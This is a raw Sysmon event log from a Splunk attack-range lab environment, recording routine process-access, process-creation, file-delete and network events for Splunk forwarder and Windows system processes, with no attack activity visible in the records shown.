10341000x8000000000000000295379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.934{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.934{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.934{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.934{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-152B-6216-BE06-000000003802}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.932{C8EA50B7-152B-6216-BE06-000000003802}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:19.583{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40BFCE977D5EC32AC6D9C3BAB3EC2F4D,SHA256=C60AE1D020F87BB6FC8E78E72AAF5C8F790D5EB53C64ED3C017A0FD174B7C9F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.700{C8EA50B7-152B-6216-BD06-000000003802}64127156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-152B-6216-BD06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-152B-6216-BD06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.315{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-152B-6216-BD06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:19.316{C8EA50B7-152B-6216-BD06-000000003802}6412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F761605C2EED9DE83E747B1BE1931994,SHA256=B99653120DB1B70E74FCE3B67E0FA54F2129CAB85E4FD2C4C50B5C04B2779603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:20.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F32A30910A112483BDB2EDCF436F590,SHA256=6EB3EAA0A3339CCD23BA07CBFB64C6039163D1A016BABED73F0FE245FADE7F59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.684{C8EA50B7-152C-6216-BF06-000000003802}44566604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.437{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-152C-6216-BF06-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.435{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.435{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.435{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.434{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.434{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-152C-6216-BF06-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.433{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-152C-6216-BF06-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.433{C8EA50B7-152C-6216-BF06-000000003802}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:20.233{C8EA50B7-152B-6216-BE06-000000003802}68081016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.953{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B87A901A08947E25D2187197EE9C24E,SHA256=5CE5231CE8212DDCFFC90F465459D0A801E145596906F5AEDF866E2105046706,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:21.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E9F0EDC12FC1FB439ED86C82BC7B0D,SHA256=D7B3CE8987133397BBCB7BF0897CC8457627DAC3F57C18F30C1391CE38EF5960,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:19.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51524-false10.0.1.12-8000- 10341000x8000000000000000295402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:21.100{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-152D-6216-C006-000000003802}5776C:\Program 